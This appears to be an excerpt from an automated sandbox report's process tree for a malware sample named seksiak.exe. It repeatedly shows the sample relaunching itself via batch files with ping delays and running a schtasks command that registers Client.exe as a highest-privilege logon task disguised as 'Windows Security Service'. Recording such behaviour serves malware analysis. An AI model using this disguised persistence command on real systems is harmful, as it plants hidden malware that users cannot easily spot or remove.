C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"102⤵PID:7300
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f103⤵PID:5640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2IeS96wQj5H2.bat" "103⤵PID:1872
-
C:\Windows\system32\chcp.comchcp 65001104⤵PID:5728
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost104⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"104⤵PID:9208
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f105⤵
- Scheduled Task/Job: Scheduled Task
PID:2620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nGR5Sv1Yoplm.bat" "105⤵PID:4060
-
C:\Windows\system32\chcp.comchcp 65001106⤵PID:5304
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost106⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"106⤵PID:2552
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f107⤵PID:1920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Pm8fkbntLY8w.bat" "107⤵PID:3408
-
C:\Windows\system32\chcp.comchcp 65001108⤵PID:2260
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost108⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5600
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"108⤵PID:3972
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f109⤵
- Scheduled Task/Job: Scheduled Task
PID:8072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yWkyrmLWunrC.bat" "109⤵PID:200
-
C:\Windows\system32\chcp.comchcp 65001110⤵PID:3692
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost110⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"110⤵PID:7716
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f111⤵PID:7832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\noP8L17aDhtO.bat" "111⤵PID:5888
-
C:\Windows\system32\chcp.comchcp 65001112⤵PID:8108
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2588
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"112⤵PID:6344
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f113⤵PID:6292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AJ7a04lSiqQi.bat" "113⤵PID:6780
-
C:\Windows\system32\chcp.comchcp 65001114⤵PID:6840
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost114⤵
- Runs ping.exe
PID:6504
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"114⤵PID:3696
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f115⤵
- Scheduled Task/Job: Scheduled Task
PID:2220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bb3baf6oovZW.bat" "115⤵PID:2000
-
C:\Windows\system32\chcp.comchcp 65001116⤵PID:7620
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost116⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5884
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"116⤵PID:7784
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f117⤵
- Scheduled Task/Job: Scheduled Task
PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nEIjAeg0hoDD.bat" "117⤵PID:5340
-
C:\Windows\system32\chcp.comchcp 65001118⤵PID:4824
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost118⤵
- Runs ping.exe
PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"118⤵PID:5176
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f119⤵
- Scheduled Task/Job: Scheduled Task
PID:3008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GfEefjBazzgW.bat" "119⤵PID:5656
-
C:\Windows\system32\chcp.comchcp 65001120⤵PID:8632
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost120⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8820
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"120⤵PID:3124
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f121⤵
- Scheduled Task/Job: Scheduled Task
PID:8900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OzIIv6RQXOTK.bat" "121⤵PID:9200
-
C:\Windows\system32\chcp.comchcp 65001122⤵PID:4840
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-